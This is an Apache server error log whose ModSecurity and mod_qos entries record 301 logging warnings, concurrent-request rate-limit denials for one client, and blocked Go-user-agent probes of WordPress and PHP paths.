[Tue May 26 20:00:01.339944 2026] [security2:error] [pid 93576:tid 93778] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuZ2DRMqfxdEDkosz5RwAAAEI"]
[Tue May 26 20:00:01.343222 2026] [security2:error] [pid 106517:tid 106685] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuZ4ZZc2DoU1lPnP1WMgAAAKc"]
[Tue May 26 20:00:01.348611 2026] [security2:error] [pid 93576:tid 93820] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuZ2DRMqfxdEDkosz5RQAAAGw"]
[Tue May 26 20:00:01.365376 2026] [security2:error] [pid 106517:tid 106755] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuaIZZc2DoU1lPnP1WcQAAAO0"]
[Tue May 26 20:00:01.369423 2026] [security2:error] [pid 106517:tid 106735] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuZ4ZZc2DoU1lPnP1WNAAAANk"]
[Tue May 26 20:00:01.369437 2026] [security2:error] [pid 106517:tid 106649] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuaIZZc2DoU1lPnP1WegAAAIU"]
[Tue May 26 20:00:01.371420 2026] [security2:error] [pid 106517:tid 106715] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuZ4ZZc2DoU1lPnP1WOgAAAMU"]
[Tue May 26 20:00:01.383561 2026] [security2:error] [pid 106517:tid 106745] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuaIZZc2DoU1lPnP1WXgAAAOM"]
[Tue May 26 20:00:01.386140 2026] [security2:error] [pid 106517:tid 106695] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuaIZZc2DoU1lPnP1WcAAAALE"]
[Tue May 26 20:00:01.399936 2026] [security2:error] [pid 106517:tid 106683] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuaIZZc2DoU1lPnP1WcwAAAKU"]
[Tue May 26 20:00:01.400612 2026] [security2:error] [pid 106517:tid 106721] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuZ4ZZc2DoU1lPnP1WPgAAAMs"]
[Tue May 26 20:00:01.406575 2026] [security2:error] [pid 106517:tid 106694] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuaIZZc2DoU1lPnP1WgQAAALA"]
[Tue May 26 20:00:01.406724 2026] [security2:error] [pid 93576:tid 93832] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuaGDRMqfxdEDkosz5mgAAAHg"]
[Tue May 26 20:00:01.412269 2026] [security2:error] [pid 106517:tid 106703] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuZ4ZZc2DoU1lPnP1WQAAAALk"]
[Tue May 26 20:00:01.420010 2026] [security2:error] [pid 106517:tid 106682] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuaIZZc2DoU1lPnP1WhAAAAKQ"]
[Tue May 26 20:00:01.442157 2026] [security2:error] [pid 106517:tid 106708] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuaIZZc2DoU1lPnP1WfQAAAL4"]
[Tue May 26 20:00:01.442769 2026] [security2:error] [pid 106517:tid 106660] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuaIZZc2DoU1lPnP1WmAAAAI8"]
[Tue May 26 20:00:01.679374 2026] [qos:error] [pid 106517:tid 106674] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWuaYZZc2DoU1lPnP1W3AAAAJ0
[Tue May 26 20:00:01.685894 2026] [qos:error] [pid 106517:tid 106770] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWuaYZZc2DoU1lPnP1W3wAAAPw
[Tue May 26 20:00:01.687281 2026] [qos:error] [pid 106517:tid 106672] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWuaYZZc2DoU1lPnP1W4AAAAJs
[Tue May 26 20:00:01.747634 2026] [qos:error] [pid 106517:tid 106657] [client 45.148.10.120:58056] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuaYZZc2DoU1lPnP1W4wAAAIw
[Tue May 26 20:00:01.747638 2026] [qos:error] [pid 93576:tid 93814] [client 45.148.10.120:57842] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=102, c=45.148.10.120, id=ahWuaWDRMqfxdEDkosz6OgAAAGY
[Tue May 26 20:00:01.747727 2026] [qos:error] [pid 93576:tid 93807] [client 45.148.10.120:35216] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuaWDRMqfxdEDkosz6OAAAAF8
[Tue May 26 20:00:01.748250 2026] [qos:error] [pid 93576:tid 93767] [client 45.148.10.120:35336] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuaWDRMqfxdEDkosz6OQAAADc
[Tue May 26 20:00:01.750002 2026] [qos:error] [pid 93576:tid 93832] [client 45.148.10.120:35344] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuaWDRMqfxdEDkosz6PAAAAHg
[Tue May 26 20:00:01.758194 2026] [qos:error] [pid 106517:tid 106776] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWuaYZZc2DoU1lPnP1W5gAAAQI
[Tue May 26 20:00:01.787260 2026] [security2:error] [pid 106517:tid 106694] [client 103.163.220.49:36251] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/mah.php"] [unique_id "ahWuaYZZc2DoU1lPnP1W6AAAALA"]
[Tue May 26 20:00:01.788163 2026] [qos:error] [pid 93576:tid 93764] [client 45.148.10.120:35172] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuaWDRMqfxdEDkosz6PwAAADQ
[Tue May 26 20:00:02.272446 2026] [security2:error] [pid 93576:tid 93712] [client 103.163.220.23:56021] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/wp-config-sample.php"] [unique_id "ahWuamDRMqfxdEDkosz6RwAAAAA"]
[Tue May 26 20:00:02.282730 2026] [security2:error] [pid 93576:tid 93827] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuaGDRMqfxdEDkosz5tQAAAHM"]
[Tue May 26 20:00:02.299342 2026] [security2:error] [pid 106517:tid 106767] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuaIZZc2DoU1lPnP1WjAAAAPk"]
[Tue May 26 20:00:02.301385 2026] [qos:error] [pid 93576:tid 93758] [client 45.148.10.120:35272] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuamDRMqfxdEDkosz6TwAAAC4
[Tue May 26 20:00:02.301558 2026] [qos:error] [pid 93576:tid 93754] [client 45.148.10.120:35216] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuamDRMqfxdEDkosz6SwAAACo
[Tue May 26 20:00:02.303577 2026] [qos:error] [pid 93576:tid 93782] [client 45.148.10.120:57842] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuamDRMqfxdEDkosz6UAAAAEY
[Tue May 26 20:00:02.304894 2026] [qos:error] [pid 93576:tid 93787] [client 45.148.10.120:35172] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuamDRMqfxdEDkosz6UQAAAEs
[Tue May 26 20:00:02.305753 2026] [qos:error] [pid 106517:tid 106656] [client 45.148.10.120:58056] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuaoZZc2DoU1lPnP1XAQAAAIs
[Tue May 26 20:00:02.309535 2026] [qos:error] [pid 93576:tid 93779] [client 45.148.10.120:35344] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuamDRMqfxdEDkosz6UwAAAEM
[Tue May 26 20:00:02.312227 2026] [security2:error] [pid 106517:tid 106746] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuaIZZc2DoU1lPnP1WggAAAOQ"]
[Tue May 26 20:00:02.312711 2026] [security2:error] [pid 93576:tid 93739] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuaGDRMqfxdEDkosz5twAAABs"]
[Tue May 26 20:00:02.314524 2026] [security2:error] [pid 106517:tid 106763] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuaIZZc2DoU1lPnP1WfgAAAPU"]
[Tue May 26 20:00:02.315132 2026] [security2:error] [pid 106517:tid 106702] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuaIZZc2DoU1lPnP1WfAAAALg"]
[Tue May 26 20:00:02.317684 2026] [security2:error] [pid 106517:tid 106756] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuaIZZc2DoU1lPnP1WmgAAAO4"]
[Tue May 26 20:00:02.323965 2026] [security2:error] [pid 93576:tid 93768] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuaGDRMqfxdEDkosz5vgAAADg"]
[Tue May 26 20:00:02.329864 2026] [security2:error] [pid 93576:tid 93724] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuaGDRMqfxdEDkosz5wQAAAAw"]
[Tue May 26 20:00:02.331845 2026] [security2:error] [pid 106517:tid 106727] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuaIZZc2DoU1lPnP1WlwAAANE"]
[Tue May 26 20:00:02.362487 2026] [security2:error] [pid 93576:tid 93769] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuaGDRMqfxdEDkosz5vwAAADk"]
[Tue May 26 20:00:02.365717 2026] [security2:error] [pid 106517:tid 106718] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuaIZZc2DoU1lPnP1WmwAAAMg"]
[Tue May 26 20:00:02.368318 2026] [security2:error] [pid 106517:tid 106659] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuaIZZc2DoU1lPnP1WnAAAAI4"]
[Tue May 26 20:00:02.375911 2026] [security2:error] [pid 93576:tid 93713] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuaGDRMqfxdEDkosz5vQAAAAE"]
[Tue May 26 20:00:02.393947 2026] [security2:error] [pid 93576:tid 93774] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuaGDRMqfxdEDkosz5uAAAAD4"]
[Tue May 26 20:00:02.394827 2026] [security2:error] [pid 93576:tid 93760] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuaGDRMqfxdEDkosz5tgAAADA"]
[Tue May 26 20:00:02.398976 2026] [security2:error] [pid 93576:tid 93811] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuaGDRMqfxdEDkosz5xgAAAGM"]
[Tue May 26 20:00:02.403955 2026] [security2:error] [pid 106517:tid 106748] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuaIZZc2DoU1lPnP1WnQAAAOY"]
[Tue May 26 20:00:02.413959 2026] [security2:error] [pid 93576:tid 93745] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuaGDRMqfxdEDkosz5zgAAACE"]
[Tue May 26 20:00:02.427578 2026] [security2:error] [pid 106517:tid 106758] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuaYZZc2DoU1lPnP1WwQAAAPA"]
[Tue May 26 20:00:02.429872 2026] [security2:error] [pid 93576:tid 93830] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuaGDRMqfxdEDkosz5wAAAAHY"]
[Tue May 26 20:00:02.452808 2026] [security2:error] [pid 93576:tid 93838] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuaGDRMqfxdEDkosz5xQAAAH4"]
[Tue May 26 20:00:02.455776 2026] [security2:error] [pid 93576:tid 93799] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuaGDRMqfxdEDkosz5zQAAAFc"]
[Tue May 26 20:00:02.463871 2026] [security2:error] [pid 106517:tid 106697] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuaIZZc2DoU1lPnP1WoAAAALM"]
[Tue May 26 20:00:02.594531 2026] [security2:error] [pid 93576:tid 93781] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWuamDRMqfxdEDkosz6QgAAAEU"]
[Tue May 26 20:00:02.762141 2026] [security2:error] [pid 106517:tid 106651] [client 103.163.220.22:40881] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/wp-admin/"] [unique_id "ahWuaoZZc2DoU1lPnP1XPQAAAIY"]
[Tue May 26 20:00:02.779173 2026] [qos:error] [pid 93576:tid 93712] [client 45.148.10.120:34966] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuamDRMqfxdEDkosz6cgAAAAA
[Tue May 26 20:00:02.779192 2026] [qos:error] [pid 93576:tid 93766] [client 45.148.10.120:57956] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=102, c=45.148.10.120, id=ahWuamDRMqfxdEDkosz6cQAAADY
[Tue May 26 20:00:02.780615 2026] [qos:error] [pid 93576:tid 93742] [client 45.148.10.120:35150] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuamDRMqfxdEDkosz6dAAAAB4
[Tue May 26 20:00:02.797108 2026] [qos:error] [pid 106517:tid 106758] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWuaoZZc2DoU1lPnP1XPwAAAPA
[Tue May 26 20:00:02.955331 2026] [security2:error] [pid 106517:tid 106736] [client 36.65.196.101:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWuaoZZc2DoU1lPnP1XCwAAANo"]
[Tue May 26 20:00:03.146349 2026] [qos:error] [pid 106517:tid 106674] [client 45.148.10.120:57980] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWua4ZZc2DoU1lPnP1XVQAAAJ0
[Tue May 26 20:00:03.146794 2026] [qos:error] [pid 106517:tid 106748] [client 45.148.10.120:58044] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWua4ZZc2DoU1lPnP1XVgAAAOY
[Tue May 26 20:00:03.148182 2026] [qos:error] [pid 106517:tid 106690] [client 45.148.10.120:58084] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWua4ZZc2DoU1lPnP1XVwAAAKw
[Tue May 26 20:00:03.149853 2026] [qos:error] [pid 93576:tid 93839] [client 45.148.10.120:57922] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWua2DRMqfxdEDkosz6eAAAAH8
[Tue May 26 20:00:03.149942 2026] [qos:error] [pid 93576:tid 93744] [client 45.148.10.120:57882] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWua2DRMqfxdEDkosz6eQAAACA
[Tue May 26 20:00:03.150308 2026] [qos:error] [pid 93576:tid 93779] [client 45.148.10.120:34960] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWua2DRMqfxdEDkosz6egAAAEM
[Tue May 26 20:00:03.264841 2026] [security2:error] [pid 106517:tid 106760] [client 103.125.146.81:57073] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/wp-includes/css/"] [unique_id "ahWua4ZZc2DoU1lPnP1XXQAAAPI"]
[Tue May 26 20:00:03.276655 2026] [security2:error] [pid 93576:tid 93834] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuaWDRMqfxdEDkosz5_gAAAHo"]
[Tue May 26 20:00:03.285504 2026] [security2:error] [pid 106517:tid 106707] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuaYZZc2DoU1lPnP1WwAAAAL0"]
[Tue May 26 20:00:03.288679 2026] [security2:error] [pid 106517:tid 106751] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuaYZZc2DoU1lPnP1W0AAAAOk"]
[Tue May 26 20:00:03.293881 2026] [security2:error] [pid 93576:tid 93818] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuaWDRMqfxdEDkosz6LwAAAGo"]
[Tue May 26 20:00:03.293911 2026] [security2:error] [pid 106517:tid 106691] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuaYZZc2DoU1lPnP1WwgAAAK0"]
[Tue May 26 20:00:03.293911 2026] [security2:error] [pid 93576:tid 93802] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuaWDRMqfxdEDkosz6HQAAAFo"]
[Tue May 26 20:00:03.302787 2026] [security2:error] [pid 106517:tid 106723] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuaIZZc2DoU1lPnP1WoQAAAM0"]
[Tue May 26 20:00:03.307598 2026] [security2:error] [pid 93576:tid 93817] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuaWDRMqfxdEDkosz6KQAAAGk"]
